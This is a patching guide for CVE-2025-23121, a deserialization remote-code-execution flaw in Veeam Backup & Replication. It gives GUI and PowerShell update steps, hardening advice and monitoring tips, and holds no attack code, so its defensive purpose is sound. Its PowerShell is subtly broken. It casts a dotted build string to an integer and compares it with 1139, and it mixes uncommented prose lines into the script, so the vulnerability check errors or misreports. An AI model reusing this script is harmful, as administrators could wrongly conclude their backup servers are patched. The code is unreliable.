Fix CVE-2025-23121: Critical Veeam RCE Vulnerability

A remote code execution (RVE) vulnerability, CVE-2025-23121 (CVSS 9.9), affects Veeam Backup & Replication. Any authenticated domain user can execute arbitrary code on a domain-joined backup server due to a BinaryFormatter deserialization flaw in builds up to 12.3.1.1139.

The Fix

Update Veeam Backup & Replication to version 12.3.2 (build 12.3.2.3617). This patch fixes the insecure deserialization.

Method 1: Apply the Official Patch via GUI

1. Log into the Veeam Backup & Replication console with a local Administrator account.

2. Navigate to Help > Check for Updates.

3. Download and run the updater for version 12.3.2.3617.

4. Follow the installer prompts, allowing it to stop and restart VBR services.

5. Proceed to the Verify section below.

If the in-console updater fails: Download the full installation ISO for version 12.3.2 from the Veeam website. Mount the ISO and run the installer to perform an in-place upgrade.

Method 2: Scripted Update and Verification

For managing multiple servers, use PowerShell to check the current version. The patch must still be sourced from Veeam.

# Check current VBR build version
$VeeamRegPath = "HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication"
$CurrentBuild = (Get-ItemProperty -Path $VeeamRegPath).Build
Write-Host "Current Veeam Build: $CurrentBuild"

If build is 1139 or lower, it is vulnerable.
if ([int]$CurrentBuild -le 1139) {
 Write-Warning "Server is vulnerable to CVE-2025-23121. Update to build 12.3.2.3617 required."
}

To perform a silent installation after obtaining the official 12.3.2.3617 update package:

# Example silent install command. Adjust the path to your downloaded update executable.
Start-Process -FilePath "X:\VeeamBackup&Replication_12.3.2.3617.exe" -ArgumentList "/silent /norestart" -Wait

Restart core VBR services after update
Restart-Service "VeeamBackupSvc" -Force
Restart-Service "VeeamTransportSvc" -Force

Additional Hardening (Post-Patch):

Apply these security practices after patching:

Isolate Backup Servers: Do not domain-join backup servers. Use local accounts for administration.
Restrict Access: Minimize the number of domain users with access to the VBR server and console. Control membership in the Backup Operators role.
Network Segmentation: Place the Veeam backup server within a secured network segment, not publicly exposed.

Verify

Confirm the patch is applied and check for indicators of compromise.

1. Verify the Patch: In the Veeam console, go to Help > About. The version must read 12.3.2.3617. You can also re-run the PowerShell command Get-ItemProperty "HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication" | Select-Object Build to confirm the build number.

2. Check for Related Vulnerabilities: Also address CVE-2025-24286, which is patched in the same 12.3.2 update.

3. Monitor for Exploitation: This vulnerability does not generate specific errors. Monitor Windows Event Logs for suspicious activity following domain account authentication, such as unexpected process creation (4688), PowerShell execution, or network connections from VeeamBackupSvc.exe.

Common Mistake: Do not rely on network isolation or domain authentication alone. This vulnerability requires authentication, so any compromised domain account can be used for exploitation. The patch is the only effective mitigation.